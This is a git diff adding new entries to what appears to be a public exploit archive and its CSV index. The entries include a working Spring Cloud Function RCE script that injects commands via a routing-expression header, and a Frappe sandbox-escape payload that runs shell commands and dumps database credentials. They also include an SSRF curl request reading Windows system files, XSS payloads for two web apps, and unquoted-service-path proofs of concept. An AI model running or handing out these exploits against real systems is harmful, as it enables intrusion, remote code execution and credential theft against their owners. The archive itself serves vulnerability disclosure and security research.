diff --git a/exploits/hardware/webapps/51582.txt b/exploits/hardware/webapps/51582.txt
new file mode 100644
index 000000000..d4075cf8a
--- /dev/null
+++ b/exploits/hardware/webapps/51582.txt
@@ -0,0 +1,71 @@
+#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
+#Exploit Author: LiquidWorm
+
+
+Vendor: Ateme
+Product web page: https://www.ateme.com
+Affected version: 3.9.12.4
+                  3.9.11.0
+                  3.9.9.2
+                  3.9.8.0
+
+Summary: TITAN File is a multi-codec/format video transcoding
+software, for mezzanine, STB and ABR VOD, PostProduction, Playout
+and Archive applications. TITAN File is based on ATEME 5th Generation
+STREAM compression engine and delivers the highest video quality
+at minimum bitrates with accelerated parallel processing.
+
+Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability
+exists in the Titan File video transcoding software. The application
+parses user supplied data in the job callback url GET parameter. Since
+no validation is carried out on the parameter, an attacker can specify
+an external domain and force the application to make an HTTP/DNS/File
+request to an arbitrary destination. This can be used by an external
+attacker for example to bypass firewalls and initiate a service, file
+and network enumeration on the internal network through the affected
+application.
+
+Tested on: Microsoft Windows
+           NodeJS
+           Ateme KFE Software
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5781
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php
+
+
+22.04.2023
+
+--
+
+
+curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
+         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
+         -H "User-Agent: sunee-mode" \
+         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"
+
+Call to file://C:\\windows\\system.ini returned 0
+
+---
+
+HTTP from Server
+----------------
+
+POST / HTTP/1.1
+Host: ssrftest.zeroscience.mk
+Accept: */*
+Content-Type: application/xml
+Content-Length: 192
+
+<?xml version='1.0' encoding='UTF-8' ?>
+<update>
+   <id>0000</id>
+   <name>dummy test job</name>
+   <status>aborted</status>
+   <progress>50</progress>
+   <message>message</message>
+</update>
\ No newline at end of file
diff --git a/exploits/java/webapps/51576.txt b/exploits/java/webapps/51576.txt
new file mode 100644
index 000000000..fa1ccf2dd
--- /dev/null
+++ b/exploits/java/webapps/51576.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://decapcms.org/docs/intro/
+# Software Link: https://github.com/decaporg/decap-cms
+# Version: 2.10.192
+# Tested on: https://cms-demo.netlify.com
+
+
+Description:
+
+1. Go to new post and write body field your payload:
+
+https://cms-demo.netlify.com/#/collections/posts
+
+Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
+
+2. After save it XSS payload will executed and see alert box
\ No newline at end of file
diff --git a/exploits/java/webapps/51577.py b/exploits/java/webapps/51577.py
new file mode 100755
index 000000000..4ddde9f09
--- /dev/null
+++ b/exploits/java/webapps/51577.py
@@ -0,0 +1,23 @@
+# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)
+# Date: 07/07/2023
+# Exploit Author: GatoGamer1155, 0bfxgh0st
+# Vendor Homepage: https://spring.io/projects/spring-cloud-function/
+# Description: Exploit to execute commands exploiting CVE-2022-22963
+# Software Link: https://spring.io/projects/spring-cloud-function
+# CVE: CVE-2022-22963
+
+import requests, argparse, json
+
+parser = argparse.ArgumentParser()
+parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)
+parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)
+args = parser.parse_args()
+
+print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")
+
+headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command }
+data = {"data": ""}
+
+request = requests.post(args.url, data=data, headers=headers)
+response = json.dumps(json.loads(request.text), indent=2)
+print(response)
\ No newline at end of file
diff --git a/exploits/php/webapps/51581.txt b/exploits/php/webapps/51581.txt
new file mode 100644
index 000000000..4d8e46059
--- /dev/null
+++ b/exploits/php/webapps/51581.txt
@@ -0,0 +1,16 @@
+# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
+# Date: 06/07/2023
+# Exploit Author: Idan Malihi
+# Vendor Homepage: None
+# Version: 5
+# Tested on: Microsoft Windows 10 Pro
+# CVE : CVE-2023-36163
+
+#PoC:
+An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
+'><script>prompt("XSS");</script><div id="aa
+
+After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
+
+#Payload:
+company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
\ No newline at end of file
diff --git a/exploits/python/webapps/51580.txt b/exploits/python/webapps/51580.txt
new file mode 100644
index 000000000..76085fec9
--- /dev/null
+++ b/exploits/python/webapps/51580.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
+# Exploit Author: Sander Ferdinand
+# Date: 2023-06-07
+# Version: 13.4.0
+# Vendor Homepage: http://erpnext.org
+# Software Link: https://github.com/frappe/frappe/
+# Tested on: Ubuntu 22.04
+# CVE : none
+
+Silly sandbox escape.
+
+> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.
+
+Requirements:
+- 'System Manager' role (which is not necessarily the admin)
+- Server config `server_script_enabled` set to `true` (likely)
+
+Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload.
+
+```python3
+hax = "echo pwned > /tmp/pwned"
+g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
+for x in g:0
+```
+
+Context:
+- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/
+- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6
+- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script
+- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42
+
+Bonus:
+
+More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`:
+
+```python3
+hax = """
+{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}
+""".strip()
+
+g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
+for x in g:0
+```
+
+Which prints the Frappe config like database/redis credentials, etc.
+
+In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.
\ No newline at end of file
diff --git a/exploits/windows/local/51578.txt b/exploits/windows/local/51578.txt
new file mode 100644
index 000000000..d815cdfba
--- /dev/null
+++ b/exploits/windows/local/51578.txt
@@ -0,0 +1,34 @@
+# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
+# Date: 06/07/2023
+# Exploit Author: Idan Malihi
+# Vendor Homepage: https://www.minitool.com/
+# Software Link: https://www.minitool.com/download-center/
+# Version: 12.7
+# Tested on: Microsoft Windows 10 Pro
+# CVE : CVE-2023-36164
+
+# PoC
+
+C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+MTAgentService                                                                      MTAgentService                            C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe                             Auto
+
+C:\Users>sc qc MTAgentService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: MTAgentService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : MTAgentService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users>systeminfo
+
+Host Name:                 DESKTOP-LA7J17P
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+OS Manufacturer:           Microsoft Corporation
\ No newline at end of file
diff --git a/exploits/windows/local/51579.txt b/exploits/windows/local/51579.txt
new file mode 100644
index 000000000..627dccfa0
--- /dev/null
+++ b/exploits/windows/local/51579.txt
@@ -0,0 +1,34 @@
+# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
+# Date: 06/07/2023
+# Exploit Author: Idan Malihi
+# Vendor Homepage: https://www.minitool.com/
+# Software Link: https://www.minitool.com/download-center/
+# Version: 12.7
+# Tested on: Microsoft Windows 10 Pro
+# CVE : CVE-2023-36165
+
+#PoC
+
+C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+MTSchedulerService                                                                  MTSchedulerService                        C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe                         Auto
+
+C:\Users>sc qc MTSchedulerService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: MTSchedulerService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : MTSchedulerService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users>systeminfo
+
+Host Name:                 DESKTOP-LA7J17P
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+OS Manufacturer:           Microsoft Corporation
\ No newline at end of file
diff --git a/exploits/windows/local/51583.txt b/exploits/windows/local/51583.txt
new file mode 100644
index 000000000..05a721942
--- /dev/null
+++ b/exploits/windows/local/51583.txt
@@ -0,0 +1,34 @@
+# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
+# Date: 06/07/2023
+# Exploit Author: Idan Malihi
+# Vendor Homepage: https://www.avg.com
+# Software Link: https://www.avg.com/en-ww/homepage#pc
+# Version: 7.5
+# Tested on: Microsoft Windows 10 Pro
+# CVE : CVE-2023-36167
+
+#PoC
+
+C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+AVG Anti-Spyware Guard                                                              AVG Anti-Spyware Guard                    C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe                            Auto
+
+C:\Users>sc qc "AVG Anti-Spyware Guard"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AVG Anti-Spyware Guard
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : AVG Anti-Spyware Guard
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users>systeminfo
+
+Host Name:                 DESKTOP-LA7J17P
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+OS Manufacturer:           Microsoft Corporation
\ No newline at end of file
diff --git a/exploits/windows/local/51584.txt b/exploits/windows/local/51584.txt
new file mode 100644
index 000000000..71a74c475
--- /dev/null
+++ b/exploits/windows/local/51584.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
+# Date: 06/07/2023
+# Exploit Author: Idan Malihi
+# Vendor Homepage: https://www.allradiosoft.ru
+# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
+# Version: 5
+# Tested on: Microsoft Windows 10 Pro
+# CVE : CVE-2023-36166
+
+#PoC
+
+C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i
+auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+Game Jackal Server v5
+        GJServiceV5                               C:\Program Files
+(x86)\SlySoft\Game Jackal v5\Server.exe                                 Auto
+
+C:\Users>sc qc GJServiceV5
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: GJServiceV5
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\SlySoft\Game Jackal
+v5\Server.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Game Jackal Server v5
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users>systeminfo
+
+Host Name:                 DESKTOP-LA7J17P
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+OS Manufacturer:           Microsoft Corporation
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 999d044cb..dbeb5d010 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4043,6 +4043,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41572,exploits/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",webapps,hardware,,2017-03-10,2017-03-10,0,CVE-2017-6549,,,,,https://bierbaumer.net/security/asuswrt/
 44937,exploits/hardware/webapps/44937.txt,"AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)",2018-06-25,Wadeek,webapps,hardware,80,2018-06-25,2018-06-25,0,,"Cross-Site Request Forgery (CSRF)",,,,
 39962,exploits/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,webapps,hardware,80,2016-06-16,2016-06-16,0,,,,,,
+51582,exploits/hardware/webapps/51582.txt,"Ateme TITAN File 3.9 - SSRF File Enumeration",2023-07-11,LiquidWorm,webapps,hardware,,2023-07-11,2023-07-11,0,,,,,,
 49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,,2020-11-30,2020-11-30,0,,,,,,
 46896,exploits/hardware/webapps/46896.txt,"AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting",2019-05-22,Luca.Chiou,webapps,hardware,,2019-05-22,2019-05-29,0,CVE-2019-11368,,,,,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,,2019-06-03,2019-06-03,0,,,,,,
@@ -5526,6 +5527,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32574,exploits/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",webapps,java,,2008-11-09,2014-03-29,1,OSVDB-49752;OSVDB-105626,,,,,https://www.securityfocus.com/bid/32208/info
 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,,2012-12-13,2017-05-12,1,,,,,,https://www.securityfocus.com/bid/56933/info
 51205,exploits/java/webapps/51205.py,"Nacos 2.0.3 - Access Control vulnerability",2023-04-03,"Jenson Zhao",webapps,java,,2023-04-03,2023-04-03,0,CVE-2021-43116,,,,,
+51576,exploits/java/webapps/51576.txt,"Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)",2023-07-11,tmrswrr,webapps,java,,2023-07-11,2023-07-11,0,,,,,,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,,2021-03-29,2021-03-29,0,,,,,,
 26001,exploits/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",webapps,java,,2005-07-15,2013-06-07,1,CVE-2005-2276;OSVDB-18064,,,,,https://www.securityfocus.com/bid/14310/info
 32909,exploits/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",webapps,java,,2009-04-15,2019-03-28,1,CVE-2009-1294;OSVDB-53937,,,,,https://www.securityfocus.com/bid/34531/info
@@ -5577,6 +5579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz,
 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,,
 33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info
+51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,,
 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,,
 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,,
 50799,exploits/java/webapps/50799.py,"Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)",2022-03-07,"Carlos E. Vieira",webapps,java,,2022-03-07,2022-03-07,0,CVE-2022-22947,,,,,
@@ -15104,6 +15107,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4103,exploits/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,webapps,php,,2007-06-24,,1,OSVDB-40152;CVE-2007-3448;OSVDB-38223;CVE-2007-3447;OSVDB-38205;CVE-2007-3446,,,,,http://www.h4cky0u.org/viewtopic.php?t=26834
 15509,exploits/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",webapps,php,,2010-11-13,2010-11-13,0,,,,,,
 3947,exploits/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",webapps,php,,2007-05-16,,1,OSVDB-37955;CVE-2007-2762;OSVDB-37954;OSVDB-37953;OSVDB-37952;OSVDB-37951;OSVDB-37950;OSVDB-37949,,,,,
+51581,exploits/php/webapps/51581.txt,"BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)",2023-07-11,"Idan Malihi",webapps,php,,2023-07-11,2023-07-11,0,CVE-2023-36163,,,,,
 40390,exploits/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,webapps,php,80,2016-09-19,2016-09-26,1,,,,,http://www.exploit-db.comBuilderEngine-CMS-V3.zip,
 29697,exploits/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33821,,,,,https://www.securityfocus.com/bid/22783/info
 29698,exploits/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,webapps,php,,2007-03-01,2013-11-19,1,CVE-2007-1248;OSVDB-33822,,,,,https://www.securityfocus.com/bid/22783/info
@@ -25469,9 +25473,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41730,exploits/php/webapps/41730.txt,"Parcel Delivery Booking Script 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php,,2017-03-26,2017-03-27,0,,,,,,
 7851,exploits/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,webapps,php,,2009-01-21,2017-01-23,1,OSVDB-51642;CVE-2009-0279,,,,http://www.exploit-db.compardalcms-0.2.0.tar.bz2,
 2955,exploits/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,webapps,php,,2006-12-18,2016-09-21,1,OSVDB-35709;CVE-2006-6739,,,,http://www.exploit-db.comparistemi-0_8_3.zip,
-48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0  - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,,
+48662,exploits/php/webapps/48662.txt,"Park Ticketing Management System 1.0  - 'viewid' SQL Injection",2020-07-13,gh1mau,webapps,php,,2020-07-13,2023-07-11,1,,,,,,
 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0  - Authentication Bypass",2020-07-13,gh1mau,webapps,php,,2020-07-13,2020-07-13,0,,,,,,
-49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2021-02-01,0,,,,,,
+49503,exploits/php/webapps/49503.txt,"Park Ticketing Management System 1.0 - 'viewid' SQL Injection",2021-02-01,"Zeyad Azima",webapps,php,,2021-02-01,2023-07-11,1,,,,,,
 12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php,,2010-05-26,,1,,,,,,
 17231,exploits/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,webapps,php,,2011-05-02,2011-05-02,1,,,,,,
 45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.compar6lus_11_20160225.exe,
@@ -34562,6 +34566,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
+51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
@@ -39409,6 +39414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 839,exploits/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",local,windows,,2005-02-23,,1,OSVDB-14206;CVE-2005-0506,,,,,
 17877,exploits/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,local,windows,,2011-09-20,2011-09-24,1,OSVDB-84578,,,http://www.exploit-db.com/screenshots/idlt18000/17877.png,http://www.exploit-db.comavcon.exe,
 12528,exploits/windows/local/12528.pl,"AVCON H323Call - Local Buffer Overflow",2010-05-07,"Dillon Beresford",local,windows,,2010-05-06,2011-03-03,1,,,,,http://www.exploit-db.comavcon.exe,
+51583,exploits/windows/local/51583.txt,"AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36167,,,,,
 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows,,2015-02-04,2015-02-04,0,CVE-2014-9632;OSVDB-113824,,,,,
 18109,exploits/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,local,windows,,2011-11-13,2011-11-13,1,OSVDB-77043,"Metasploit Framework (MSF)",,,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
 22932,exploits/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn",2012-11-26,Nezim,local,windows,,2012-11-26,2017-08-17,1,OSVDB-77043,,,http://www.exploit-db.com/screenshots/idlt23000/screen-shot-2012-11-26-at-120023-pm.png,http://www.exploit-db.comAviosoftDTVPlayerPro.exe,
@@ -39988,6 +39994,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10339,exploits/windows/local/10339.pl,"gAlan 0.2.1 - Local Buffer Overflow (1)",2009-12-07,"Jeremy Brown",local,windows,,2009-12-06,,1,OSVDB-60897,,,,http://www.exploit-db.comgalan-0.2.1-win32.zip,
 16664,exploits/windows/local/16664.rb,"gAlan 0.2.1 - Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows,,2010-09-25,2011-03-10,1,OSVDB-60897,"Metasploit Framework (MSF)",,,,
 10346,exploits/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,local,windows,,2009-12-06,,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comgalan-0.2.1-win32.zip,
+51584,exploits/windows/local/51584.txt,"Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36166,,,,,
 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,,2016-07-07,2016-07-07,0,,,,,,
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
@@ -40815,6 +40822,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15575,exploits/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)",2010-11-19,0v3r,local,windows,,2010-11-20,2016-09-16,1,,,,http://www.exploit-db.com/screenshots/idlt16000/15575.png,http://www.exploit-db.comminishare-1.5.5.zip,
 15406,exploits/windows/local/15406.rb,"MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)",2010-11-03,"Muhamad Fadzil Ramli",local,windows,,2010-11-03,2018-12-19,1,,,,,http://www.exploit-db.comminishare-1.5.5.zip,
 50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",2022-04-11,"Saud Alenazi",local,windows,,2022-04-11,2022-04-11,0,,,,,,
+51578,exploits/windows/local/51578.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36164,,,,,
+51579,exploits/windows/local/51579.txt,"MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36165,,,,,
